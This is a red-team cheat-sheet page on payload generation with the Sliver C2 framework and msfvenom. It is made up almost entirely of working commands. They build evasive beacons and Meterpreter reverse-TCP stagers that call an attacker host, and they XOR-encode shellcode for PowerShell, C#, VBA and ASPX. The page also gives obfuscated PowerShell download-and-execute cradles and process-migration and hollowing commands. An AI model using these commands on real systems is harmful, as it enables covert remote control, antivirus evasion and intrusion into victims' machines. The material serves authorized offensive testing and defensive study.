Payload Generation
Sliver native implants, MSFVenom stagers, XOR-encoded output formats, encoded cradles, and implant migration.
Native Implants
Generate Beacon (EXE)
sliver > generate beacon --http <ATTACKER_IP>:8088 --name sliver.obfuscated --os windows --seconds 5 --jitter 0 --evasion--seconds 5 --jitter 0— 5s callback interval--evasion— apply built-in evasion techniques
Generate Shellcode
sliver > generate --http <ATTACKER_IP>:8088 --os windows --arch amd64 --format shellcode --save ./beacon.binGenerate Stager
sliver > generate stager --lhost <ATTACKER_IP> --lport 443 --protocol mtls --os windows --arch amd64 --format shellcode --save ./stager.binMSFVenom Stagers
Generate stagers that connect to Sliver stage-listeners:
# 64-bit raw shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4443 EXITFUNC=thread -f raw -o sliver.x64.bin
# 32-bit raw shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=5553 EXITFUNC=thread -f raw -o sliver.x86.binUse
--prepend-sizeon the Sliverstage-listenerwhen using msfvenom stagers.
XOR-Encoded Output Formats (One-Liners)
All use XOR key=2. Pipe msfvenom output directly into a Python encoder.
PowerShell (x64)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4443 EXITFUNC=thread -f raw | xxd -ps -c 1 | python3 -c 'import sys; key = 2; print("[Byte[]] $buf = " + ",".join([f"0x{(int(x, 16) ^ key):02X}" for x in sys.stdin.read().split()]))'C#
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4443 EXITFUNC=thread -f raw | python3 -c 'key = 2; import sys; data = sys.stdin.buffer.read(); encrypted = bytes([b ^ key for b in data]); print(f"byte[] buf = new byte[{len(encrypted)}] {{ " + ", ".join([f"0x{b:02X}" for b in encrypted]) + " };")'VBA (x86)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=5553 EXITFUNC=thread -f raw | xxd -ps -c 1 | python3 -c 'import sys; key = 2; data = [str(int(x, 16) ^ key) for x in sys.stdin.read().split()]; chunk_size = 50; chunks = [data[i:i + chunk_size] for i in range(0, len(data), chunk_size)]; print("buf = Array(", end=""); print(", _\n".join([", ".join(chunk) for chunk in chunks]) + ")")'ASPX
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4443 EXITFUNC=thread -f raw | python3 -c 'key = 2; import sys; data = sys.stdin.buffer.read(); encrypted = bytes([b ^ key for b in data]); print(f"byte[] vL8fwOy_ = new byte[{len(encrypted)}] {{ " + ",".join([f"0x{b:02X}" for b in encrypted]) + " };")'Encoded PowerShell Cradles
Base64 encode a download cradle:
echo -en "(New-Object System.Net.WebClient).DownloadString('http://<ATTACKER_IP>/payload.ps1') | IEX" | iconv -t UTF-16LE | base64 -w 0Execute:
powershell -enc <BASE64_STRING>VBA string encoding (Caesar, key=17):
payload="powershell -exec bypass -nop -w hidden -c iex((new-object system.net.webclient).downloadstring('http://<ATTACKER_IP>/payload.txt'))"
python3 -c "payload=\"$payload\"; print(''.join(f'{ord(char) + 17:03}' for char in payload))"Implant Migration
Migrate your implant into another process for stability and to survive parent process closure.
Create Sacrificial Process
# x64 notepad
execute C:\windows\system32\notepad.exe
# x86 notepad
execute C:\windows\SysWOW64\notepad.exe
# Via Rubeus (creates process with different token)
rubeus -t 20 -- createnetonly /program:C:\windows\SysWOW64\notepad.exeFind Target PID
ps -e notepad
ps -e explorer # explorer is more stableMigrate
# migrate command (best for x86 with AV)
migrate -p <PID>
# execute-shellcode (x86)
execute-shellcode -p <PID> /path/to/sliver.x86.bin
# execute-shellcode (x64)
execute-shellcode -p <PID> /path/to/sliver.x64.bin
# execute-shellcode with shikata_ga_nai
execute-shellcode -S -r -I 10 -p <PID> /path/to/sliver.x64.binProcess Hollowing (Recommended)
hollow svchost.exe /path/to/sliver.x64.binYou may get
Call extension error: rpc error: code = Unknown desc = The parameter is incorrectbut the shell will be received regardless.
See also: 3. Beacons & Listeners, Generation & Encoding